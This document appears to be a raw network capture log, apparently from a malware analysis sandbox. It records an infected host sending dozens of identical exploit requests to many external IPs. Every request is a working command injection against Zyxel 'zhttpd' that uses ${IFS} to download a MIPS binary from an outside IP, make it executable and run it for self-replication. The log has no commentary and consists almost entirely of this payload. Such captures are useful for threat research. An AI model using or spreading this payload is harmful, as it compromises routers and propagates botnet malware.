                                        Jan 14, 2024 16:18:46.495563984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4604192.168.2.1349116182.155.135.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495616913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4605192.168.2.1347780192.48.104.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495647907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4606192.168.2.134456448.84.81.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495688915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4607192.168.2.1354564170.80.145.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495719910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4608192.168.2.1342298152.184.245.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495760918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4609192.168.2.133989665.148.89.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495806932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4610192.168.2.13426449.42.0.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495832920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4611192.168.2.1341018221.111.137.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495892048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4612192.168.2.133602065.71.163.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495919943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4613192.168.2.1352716183.127.33.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495950937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4614192.168.2.1356108109.67.132.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496018887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4615192.168.2.133859496.224.161.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496058941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4616192.168.2.134115291.207.142.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496107101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4617192.168.2.1348450208.193.180.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496117115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4618192.168.2.133702659.142.216.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496166945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4619192.168.2.1359328118.103.214.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496201038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4620192.168.2.1336348153.240.131.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496248960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4621192.168.2.1352486168.56.155.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496277094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4622192.168.2.1354818110.152.122.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496314049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4623192.168.2.133378269.26.29.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496344090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4624192.168.2.135309643.228.19.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496397972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4625192.168.2.1343662104.137.19.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496427059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4626192.168.2.134399262.9.101.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496478081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4627192.168.2.1347018184.210.105.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496521950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4628192.168.2.1342298149.98.217.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496547937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4629192.168.2.1340100115.205.96.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496603966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4630192.168.2.135338092.228.154.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496629953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4631192.168.2.134322457.180.42.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496685028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4632192.168.2.133324698.40.38.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496721983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4633192.168.2.13603709.106.10.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496778011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4634192.168.2.1337242102.120.253.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496826887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4635192.168.2.1345694165.33.7.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496849060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4636192.168.2.134438487.214.103.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496901989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4637192.168.2.13461842.103.189.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.496961117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4638192.168.2.1336858134.214.26.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497001886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4639192.168.2.1334154158.152.184.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497025967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4640192.168.2.1341622108.165.175.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497066021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4641192.168.2.1360942138.93.26.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497132063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4642192.168.2.135625268.93.239.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497164965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4643192.168.2.134619444.6.121.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497191906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4644192.168.2.1346116180.86.241.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497239113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4645192.168.2.1349232171.20.50.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497287035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4646192.168.2.1332772189.52.182.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497323036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4647192.168.2.134001471.23.86.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497368097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4648192.168.2.134444478.63.250.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497390985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4649192.168.2.1335074197.146.72.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497431040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4650192.168.2.136077898.62.79.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497463942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4651192.168.2.135895677.94.197.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497492075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4652192.168.2.134168840.212.181.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497543097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4653192.168.2.1353814170.136.146.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497569084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4654192.168.2.135436688.57.193.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497603893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4655192.168.2.133525282.236.97.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497652054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4656192.168.2.13518741.26.221.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497698069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4657192.168.2.133598038.138.169.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497765064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4658192.168.2.134244653.212.153.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497793913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4659192.168.2.1344618115.134.37.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497845888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4660192.168.2.134317695.16.160.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497891903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4661192.168.2.1353386175.234.85.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497926950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4662192.168.2.134093650.63.221.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.497948885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4663192.168.2.135944441.90.152.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498002052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4664192.168.2.1337442201.19.106.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498061895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4665192.168.2.1358260189.19.221.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498116016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4666192.168.2.135277273.206.242.219443
                                        TimestampBytes transferredDirectionData
